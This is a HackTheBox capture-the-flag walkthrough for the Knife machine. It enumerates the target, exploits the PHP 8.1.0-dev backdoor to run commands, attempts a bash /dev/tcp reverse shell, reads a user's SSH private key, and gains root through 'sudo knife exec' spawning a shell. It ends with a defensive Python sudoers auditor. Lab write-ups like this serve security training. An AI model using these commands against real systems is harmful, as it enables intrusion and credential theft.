How to get SSH access on Knife – HackTheBox


Commands :

nmap -T5

AutoRecon running in the background


Web enumeration

Commands :

nmap -sC -sV -p 80

No known exploit for Apache 2.4.41.

Not very interesting, so I have to enumerate further.

PHP 8.1.0-dev

As I always run AutoRecon in the background just in case, I check the results of all its scans. The whatweb tool gives me the versions of all the components used by the web server.

To view the results, I use Sublime Text and run this command from the scan results directory: subl .

With that, all files open automatically in Sublime Text, which saves a lot of time when you have to check the results.

whatweb command:


When you search for PHP 8.1.0-dev on Google, you find several websites discussing a backdoor that allows remote command injection, like this one:

or this one:

The first one is a Python script that does the job for you; for the second, you have to change the User-Agent header of the GET request yourself.

I decide to use the first one.

The usage line says:

python3 -u http://ip/ -c cmd

so I try this command:

python3 -u -c ls

and I get a listing of /.

Then I try to get a reverse shell, without success, with this kind of command line:

python3 -u -c 'bash -i >& /dev/tcp/ 0>&1'

Initial access - SSH

As always, think about how many ways there are into the system. Remember the first nmap scan: two ports are open, 22 and 80. So I check whether a .ssh folder exists in the home directory.

python3 -u -c 'ls -alR /home/james/'


Command to display the id_rsa key:

python3 -u -c 'cat /home/james/.ssh/id_rsa'

Then copy the output into a new file on your Kali box.

Change the permissions:

chmod 600 id_rsa

SSH connection

ssh james@ -i id_rsa

Privilege escalation

One of the first things to do is to check the user's sudo permissions with sudo -l.


James is allowed to run /usr/bin/knife as root. I spent some time searching for how I could use this to get root access.

Finally, I notice this part of the output when executing sudo /usr/bin/knife:


But that's not enough; I have to know which language the Knife software uses. Back to Google to search for documentation.

On this link, we can see that knife uses Ruby.

I try different Ruby scripts, like this one. It works, but the shell is too unstable and closes very quickly, even with this little script:

fork { exec("ls") }

Root for just a few seconds…

Finally, I try this command line:

sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"

Got root privileges!!!
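The sudo rule that hands james root through knife is exactly the kind of misconfiguration a host audit should catch before an attacker does. As an added example (my own code, not part of the original write-up), this Python script parses sudoers-style rules and flags any command that gives a non-root user code execution as another account; the sample sudoers content is constructed, not the box's real file, and the CODE_RUNNERS list is an assumption to extend for your own hosts.

```python
import re

# Binaries whose sudo rule hands out a root shell. knife is listed because `knife exec` evaluates arbitrary Ruby (the escalation above); the others are assumptions to extend.
CODE_RUNNERS = {"/usr/bin/knife", "/usr/bin/ruby", "/usr/bin/python3", "/bin/sh", "/bin/bash"}

# user  host=(runas) [TAG: ...] cmd1, cmd2  -- the (runas) part is optional in sudoers
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"^([A-Z]+):\s*")

def parse_rule(line):
    """Parse one sudoers user-spec line into its fields, or return None."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    rest, tags = m.group("rest"), set()
    while (t := TAG_RE.match(rest)):  # peel leading tags such as NOPASSWD: or SETENV:
        tags.add(t.group(1))
        rest = rest[t.end():]
    return {
        "user": m.group("user"),
        "runas": m.group("runas") or "root",  # sudo defaults the target user to root
        "tags": tags,
        "commands": [c.strip() for c in rest.split(",") if c.strip()],
    }

def audit_sudoers(text):
    """Return one finding per command that gives a non-root user code execution as someone else."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        rule = parse_rule(line)
        if rule is None or rule["user"] == "root":
            continue
        for cmd in rule["commands"]:
            if cmd == "ALL" or cmd.split()[0] in CODE_RUNNERS:
                findings.append({"user": rule["user"], "runas": rule["runas"],
                                 "command": cmd, "nopasswd": "NOPASSWD" in rule["tags"]})
    return findings

# Constructed sample, not the box's real sudoers file.
SAMPLE_SUDOERS = """Defaults env_reset
root    ALL=(ALL:ALL) ALL
james   ALL=(root) NOPASSWD: /usr/bin/knife
backup  ALL=(root) NOPASSWD: /usr/bin/id
"""

for f in audit_sudoers(SAMPLE_SUDOERS):
    print(f"{f['user']} can run {f['command']} as {f['runas']} (NOPASSWD={f['nopasswd']})")
```

Only the james/knife rule is reported; the root line and the harmless /usr/bin/id rule are left alone, so the output is a short list you can hand to whoever owns the host.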


That’s all folks

